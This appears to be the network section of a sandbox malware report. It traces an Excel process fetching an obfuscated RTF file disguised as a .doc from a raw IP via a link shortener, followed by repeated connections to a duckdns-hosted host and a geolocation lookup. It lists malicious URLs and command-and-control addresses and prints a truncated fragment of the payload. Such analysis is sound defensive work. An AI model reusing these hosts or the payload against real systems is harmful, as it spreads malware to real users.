                  Jul 26, 2024 13:09:00.089519024 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.089529991 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.089541912 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.089544058 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.089554071 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.089564085 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.089567900 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.089633942 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.089633942 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.090342045 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.090353966 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.090363979 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.090373993 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.090384960 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.090393066 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.090414047 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.090416908 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.090429068 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.090440989 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.090450048 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.090451956 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.090477943 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.090959072 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.090970993 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.090981007 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.090992928 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.091002941 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.091006041 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.091015100 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.091022968 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.091026068 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.091037035 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.091048002 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.091049910 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.091073036 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.091587067 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.091598034 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.091609001 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.091622114 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.091633081 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.091635942 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.091645002 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.091655016 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.091655970 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.091665030 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.091675997 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.091686964 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.091690063 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.091737986 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.092294931 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.092308044 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.092319012 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.092329979 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.092339993 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.092345953 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.092351913 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.092359066 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.092364073 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.092371941 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.092375994 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.092386961 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.092397928 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.092401981 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.092408895 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.092420101 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.092422009 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.092456102 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.094979048 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.094990969 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.095000982 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.095014095 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.095025063 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.095029116 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.095036983 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.095046997 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.095052004 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.095058918 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.095071077 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.095081091 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.095092058 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.095096111 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.095096111 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.095104933 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.095123053 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.095125914 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.095135927 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.095146894 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.095146894 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.095159054 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.095159054 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.095170021 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.095182896 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.095184088 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.095192909 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.095204115 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.095206022 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.095216990 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.095228910 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.095238924 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.095242023 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.095251083 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.095262051 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.095272064 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.095283985 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.095293999 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.095297098 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.095305920 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.095315933 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.095325947 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.095328093 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.095339060 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.095340967 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.095365047 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.129044056 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.129070997 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.129085064 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.129096985 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.129110098 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.129122019 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.129136086 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.129137993 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.129170895 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.129218102 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.177428007 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.177452087 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.177464008 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.177475929 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.177488089 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.177499056 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.177509069 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.177601099 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.177602053 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.177602053 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.177670002 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.177681923 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.177690983 CEST8049172192.3.176.174192.168.2.22
                  Jul 26, 2024 13:09:00.177717924 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.384567976 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.386464119 CEST4917280192.168.2.22192.3.176.174
                  Jul 26, 2024 13:09:00.386529922 CEST4917180192.168.2.22198.46.176.133
                  Jul 26, 2024 13:09:00.546581984 CEST4917314645192.168.2.22194.187.251.115
                  Jul 26, 2024 13:09:00.551611900 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:09:00.551763058 CEST4917314645192.168.2.22194.187.251.115
                  Jul 26, 2024 13:09:00.562685013 CEST4917314645192.168.2.22194.187.251.115
                  Jul 26, 2024 13:09:00.573777914 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:09:01.539443016 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:09:01.750840902 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:09:01.750905037 CEST4917314645192.168.2.22194.187.251.115
                  Jul 26, 2024 13:09:01.816678047 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:09:01.820595980 CEST4917314645192.168.2.22194.187.251.115
                  Jul 26, 2024 13:09:01.825496912 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:09:01.825615883 CEST4917314645192.168.2.22194.187.251.115
                  Jul 26, 2024 13:09:01.830477953 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:09:01.830534935 CEST4917314645192.168.2.22194.187.251.115
                  Jul 26, 2024 13:09:01.835524082 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:09:02.495759010 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:09:02.497265100 CEST4917314645192.168.2.22194.187.251.115
                  Jul 26, 2024 13:09:02.502258062 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:09:02.769778013 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:09:02.983077049 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:09:02.986278057 CEST4917314645192.168.2.22194.187.251.115
                  Jul 26, 2024 13:09:03.395087957 CEST4917480192.168.2.22178.237.33.50
                  Jul 26, 2024 13:09:03.400669098 CEST8049174178.237.33.50192.168.2.22
                  Jul 26, 2024 13:09:03.400762081 CEST4917480192.168.2.22178.237.33.50
                  Jul 26, 2024 13:09:03.401309013 CEST4917480192.168.2.22178.237.33.50
                  Jul 26, 2024 13:09:03.406310081 CEST8049174178.237.33.50192.168.2.22
                  Jul 26, 2024 13:09:04.026494980 CEST8049174178.237.33.50192.168.2.22
                  Jul 26, 2024 13:09:04.026572943 CEST4917480192.168.2.22178.237.33.50
                  Jul 26, 2024 13:09:04.033370018 CEST4917314645192.168.2.22194.187.251.115
                  Jul 26, 2024 13:09:04.038324118 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:09:05.026727915 CEST8049174178.237.33.50192.168.2.22
                  Jul 26, 2024 13:09:05.026829004 CEST4917480192.168.2.22178.237.33.50
                  Jul 26, 2024 13:09:32.877070904 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:09:32.879153013 CEST4917314645192.168.2.22194.187.251.115
                  Jul 26, 2024 13:09:32.884226084 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:09:45.895103931 CEST4916780192.168.2.22188.114.97.3
                  Jul 26, 2024 13:09:45.895287037 CEST4916880192.168.2.22188.114.96.3
                  Jul 26, 2024 13:10:02.969361067 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:10:02.970947027 CEST4917314645192.168.2.22194.187.251.115
                  Jul 26, 2024 13:10:02.977583885 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:10:08.073378086 CEST4917480192.168.2.22178.237.33.50
                  Jul 26, 2024 13:10:08.432024956 CEST4917480192.168.2.22178.237.33.50
                  Jul 26, 2024 13:10:09.040395975 CEST4917480192.168.2.22178.237.33.50
                  Jul 26, 2024 13:10:10.241583109 CEST4917480192.168.2.22178.237.33.50
                  Jul 26, 2024 13:10:12.644120932 CEST4917480192.168.2.22178.237.33.50
                  Jul 26, 2024 13:10:17.481343985 CEST4917480192.168.2.22178.237.33.50
                  Jul 26, 2024 13:10:27.136425018 CEST4917480192.168.2.22178.237.33.50
                  Jul 26, 2024 13:10:33.058919907 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:10:33.060260057 CEST4917314645192.168.2.22194.187.251.115
                  Jul 26, 2024 13:10:33.065125942 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:10:51.613073111 CEST4916980192.168.2.22188.114.97.3
                  Jul 26, 2024 13:11:03.137415886 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:11:03.138771057 CEST4917314645192.168.2.22194.187.251.115
                  Jul 26, 2024 13:11:03.143903971 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:11:33.232625961 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:11:33.235214949 CEST4917314645192.168.2.22194.187.251.115
                  Jul 26, 2024 13:11:33.240761042 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:12:03.328579903 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:12:03.361778975 CEST4917314645192.168.2.22194.187.251.115
                  Jul 26, 2024 13:12:03.366997004 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:12:33.416944981 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:12:33.418390036 CEST4917314645192.168.2.22194.187.251.115
                  Jul 26, 2024 13:12:33.423290968 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:13:03.489952087 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:13:03.491184950 CEST4917314645192.168.2.22194.187.251.115
                  Jul 26, 2024 13:13:03.496237993 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:13:33.578285933 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:13:33.579775095 CEST4917314645192.168.2.22194.187.251.115
                  Jul 26, 2024 13:13:33.584805965 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:14:03.662625074 CEST1464549173194.187.251.115192.168.2.22
                  Jul 26, 2024 13:14:03.663198948 CEST4917314645192.168.2.22194.187.251.115
                  Jul 26, 2024 13:14:03.668999910 CEST1464549173194.187.251.115192.168.2.22

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jul 26, 2024 13:08:44.008558989 CEST5456253192.168.2.228.8.8.8
                  Jul 26, 2024 13:08:44.020967960 CEST53545628.8.8.8192.168.2.22
                  Jul 26, 2024 13:08:46.128570080 CEST5291753192.168.2.228.8.8.8
                  Jul 26, 2024 13:08:46.376538038 CEST53529178.8.8.8192.168.2.22
                  Jul 26, 2024 13:08:47.720119953 CEST6275153192.168.2.228.8.8.8
                  Jul 26, 2024 13:08:47.730391979 CEST53627518.8.8.8192.168.2.22
                  Jul 26, 2024 13:08:47.732201099 CEST5789353192.168.2.228.8.8.8
                  Jul 26, 2024 13:08:47.746718884 CEST53578938.8.8.8192.168.2.22
                  Jul 26, 2024 13:08:51.646054983 CEST5482153192.168.2.228.8.8.8
                  Jul 26, 2024 13:08:51.660269976 CEST53548218.8.8.8192.168.2.22
                  Jul 26, 2024 13:08:51.661659956 CEST5471953192.168.2.228.8.8.8
                  Jul 26, 2024 13:08:51.726756096 CEST53547198.8.8.8192.168.2.22
                  Jul 26, 2024 13:09:00.438282013 CEST4988153192.168.2.228.8.8.8
                  Jul 26, 2024 13:09:00.541742086 CEST53498818.8.8.8192.168.2.22
                  Jul 26, 2024 13:09:03.381026983 CEST5499853192.168.2.228.8.8.8
                  Jul 26, 2024 13:09:03.391727924 CEST53549988.8.8.8192.168.2.22

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Jul 26, 2024 13:08:44.008558989 CEST192.168.2.228.8.8.80xa853Standard query (0)tny.wtfA (IP address)IN (0x0001)false
                  Jul 26, 2024 13:08:46.128570080 CEST192.168.2.228.8.8.80x4233Standard query (0)tny.wtfA (IP address)IN (0x0001)false
                  Jul 26, 2024 13:08:47.720119953 CEST192.168.2.228.8.8.80x8061Standard query (0)tny.wtfA (IP address)IN (0x0001)false
                  Jul 26, 2024 13:08:47.732201099 CEST192.168.2.228.8.8.80x20adStandard query (0)tny.wtfA (IP address)IN (0x0001)false
                  Jul 26, 2024 13:08:51.646054983 CEST192.168.2.228.8.8.80x1100Standard query (0)tny.wtfA (IP address)IN (0x0001)false
                  Jul 26, 2024 13:08:51.661659956 CEST192.168.2.228.8.8.80x2664Standard query (0)tny.wtfA (IP address)IN (0x0001)false
                  Jul 26, 2024 13:09:00.438282013 CEST192.168.2.228.8.8.80xcebeStandard query (0)sembe.duckdns.orgA (IP address)IN (0x0001)false
                  Jul 26, 2024 13:09:03.381026983 CEST192.168.2.228.8.8.80xbb3fStandard query (0)geoplugin.netA (IP address)IN (0x0001)false

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Jul 26, 2024 13:08:44.020967960 CEST8.8.8.8192.168.2.220xa853No error (0)tny.wtf188.114.96.3A (IP address)IN (0x0001)false
                  Jul 26, 2024 13:08:44.020967960 CEST8.8.8.8192.168.2.220xa853No error (0)tny.wtf188.114.97.3A (IP address)IN (0x0001)false
                  Jul 26, 2024 13:08:46.376538038 CEST8.8.8.8192.168.2.220x4233No error (0)tny.wtf188.114.97.3A (IP address)IN (0x0001)false
                  Jul 26, 2024 13:08:46.376538038 CEST8.8.8.8192.168.2.220x4233No error (0)tny.wtf188.114.96.3A (IP address)IN (0x0001)false
                  Jul 26, 2024 13:08:47.730391979 CEST8.8.8.8192.168.2.220x8061No error (0)tny.wtf188.114.96.3A (IP address)IN (0x0001)false
                  Jul 26, 2024 13:08:47.730391979 CEST8.8.8.8192.168.2.220x8061No error (0)tny.wtf188.114.97.3A (IP address)IN (0x0001)false
                  Jul 26, 2024 13:08:47.746718884 CEST8.8.8.8192.168.2.220x20adNo error (0)tny.wtf188.114.97.3A (IP address)IN (0x0001)false
                  Jul 26, 2024 13:08:47.746718884 CEST8.8.8.8192.168.2.220x20adNo error (0)tny.wtf188.114.96.3A (IP address)IN (0x0001)false
                  Jul 26, 2024 13:08:51.660269976 CEST8.8.8.8192.168.2.220x1100No error (0)tny.wtf188.114.97.3A (IP address)IN (0x0001)false
                  Jul 26, 2024 13:08:51.660269976 CEST8.8.8.8192.168.2.220x1100No error (0)tny.wtf188.114.96.3A (IP address)IN (0x0001)false
                  Jul 26, 2024 13:08:51.726756096 CEST8.8.8.8192.168.2.220x2664No error (0)tny.wtf188.114.97.3A (IP address)IN (0x0001)false
                  Jul 26, 2024 13:08:51.726756096 CEST8.8.8.8192.168.2.220x2664No error (0)tny.wtf188.114.96.3A (IP address)IN (0x0001)false
                  Jul 26, 2024 13:09:00.541742086 CEST8.8.8.8192.168.2.220xcebeNo error (0)sembe.duckdns.org194.187.251.115A (IP address)IN (0x0001)false
                  Jul 26, 2024 13:09:03.391727924 CEST8.8.8.8192.168.2.220xbb3fNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                  HTTP Request Dependency Graph

                  • tny.wtf
                  • 192.3.176.174
                  • 198.46.176.133
                  • geoplugin.net

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.2249165188.114.96.380724C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 13:08:44.031326056 CEST316OUTGET /sA HTTP/1.1
                  Accept: */*
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                  Host: tny.wtf
                  Connection: Keep-Alive
                  Jul 26, 2024 13:08:45.200596094 CEST750INHTTP/1.1 302 Found
                  Date: Fri, 26 Jul 2024 11:08:45 GMT
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Location: http://192.3.176.174/60/gbh/creamthingstohappenedgetmebackwithentirethingstogetbackeverythingtounderstandhowmuchpowerfulthingsitis__________wearegreatwithentirethingstobeback.doc
                  X-Powered-By: ASP.NET
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zZJ4aimGfbtijcnS3y2hoYF3OwEeFjuacCtHGKGmFpETlw43OI6Z%2FDLCLrx5uZyRSQT%2FHTXNLDV%2BWUJbDmS1Ugv6joh%2FwAaXbldV9r%2BghJGmggrRjTinxkw9"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8a93eef9c9618c41-EWR
                  alt-svc: h3=":443"; ma=86400
                  Data Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.2249166192.3.176.17480724C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 13:08:45.211235046 CEST477OUTGET /60/gbh/creamthingstohappenedgetmebackwithentirethingstogetbackeverythingtounderstandhowmuchpowerfulthingsitis__________wearegreatwithentirethingstobeback.doc HTTP/1.1
                  Accept: */*
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                  Host: 192.3.176.174
                  Connection: Keep-Alive
                  Jul 26, 2024 13:08:45.694180012 CEST1236INHTTP/1.1 200 OK
                  Date: Fri, 26 Jul 2024 11:08:45 GMT
                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                  Last-Modified: Fri, 26 Jul 2024 06:00:53 GMT
                  ETag: "14fdf-61e203bf34de1"
                  Accept-Ranges: bytes
                  Content-Length: 85983
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: application/msword
                  Data Raw: 7b 5c 72 74 66 31 0d 0d 0d 0d 0d 09 09 09 7b 5c 2a 5c 61 6f 75 74 6c 31 37 33 34 39 38 30 38 39 20 5c 22 7d 0d 7b 5c 34 34 33 36 30 39 30 35 34 60 3f 3a 60 27 31 3d 5d 32 3d 5d 36 35 36 5b 7e 38 7c 23 5f 40 a7 30 b0 25 29 35 2d 7c 38 2c 39 2c 60 21 60 35 3e 40 2e 3e 5e 3e 3c 3c 60 36 5e b0 7e 3f 7e 3c 3b 5f 3f 35 a7 36 28 32 b5 3f 3f 38 38 38 25 34 2f 26 2f 3e 38 3b 5e 27 34 21 2d 38 2e 24 37 5e 2d 36 27 2a 25 30 33 38 3f 39 3a 7c 29 2f 39 30 7e 3e 31 3f 21 2f 5d 3f 3a 7c 35 34 26 3f 28 21 29 5e 25 2e 5e 26 3f 32 7e 33 7c 33 28 7c 40 37 24 5d 2a 5e 3f 39 3a 26 21 2b 3f 5b a7 38 24 2c 7e 5d 24 26 21 39 32 7e 23 37 36 5f 24 2b 7e 5f 38 b5 2f 38 5e 30 3f 3f 3f 21 38 3f 40 36 25 40 2d 25 27 28 38 5e 25 28 3b 7e 38 3f 2c 3f 34 31 2c 39 28 36 40 25 33 b0 5b 3a 36 23 3f 24 26 34 5e 3f 5d 3b 40 7e 2a 24 3f 27 2b 3f 30 33 7e 3f 28 3b 5b 3e 40 60 3f 25 2d 34 2d 3f 30 2a 38 3b b0 3f a7 38 24 5d 5e b5 21 2f 32 a7 3f 39 a7 5e 5e 32 7e 5d 3b a7 b0 3f 35 3f b5 36 25 b0 3f 35 2d 2f 5e 7c 25 a7 7c 25 40 2f 2e 3a 30 [TRUNCATED]
                  Data Ascii: {\rtf1{\*\aoutl173498089 \"}{\443609054`?:`'1=]2=]656[~8|#_@0%)5-|8,9,`!`5>@.>^><<`6^~?~<;_?56(2??888%4/&/>8;^'4!-8.$7^-6'*%038?9:|)/90~>1?!/]?:|54&?(!)^%.^&?2~3|3(|@7$]*^?9:&!+?[8$,~]$&!92~#76_$+~_8/8^0???!8?@6%@-%'(8^%(;~8?,?41,9(6@%3[:6#?$&4^?];@~*$?'+?03~?(;[>@`?%-4-?0*8;?8$]^!/2?9^^2~];?5?6%?5-/^|%|%@/.:03,=9%?@!=>$2~%8$?.$?55%?>;@:3!7:?)?~@?41/<@/&?(2#?*<1,?`]*,1*^1!;6%7+]8?895?10,%(?|-5`%4?4+^-03$0]#*%~-5)'!02@?(4%?95#^|?3%[947=2?$_&`2??[?)();<.;??'_!3=?):5=*]=_[(-32%'++|9?5?^_>!1+!`;5?<)27??~?1;9)_*0=(%=$89-%$]6![%=&`0($!++%<%_68|>7/*|%]1&6<*-?<9(420^(??@[3(%5'_?$5-$>%5<36:=#>)2&/51@$17?,0+(%>8+>%16!4|!(.`34|86;&?%1&|^7*?*;[+&;:[12*%)]4/;6%*=/_!5?+;?@~$~[?%@=@?.>+|>$&~#?383'$^?<'5].7)~06^~|.[0?&[:%?^^;,3?%`,:^0>-<6?=&|??]?`-&|/[`780&0|!.%$8!%)4&?_:|']#;[[37&_1]:*)9:*$*%&=+?5`?5]($??#(:?!!3?)?;-6<|-_.,&??+>-;'|:<?|)24,[,%(8<
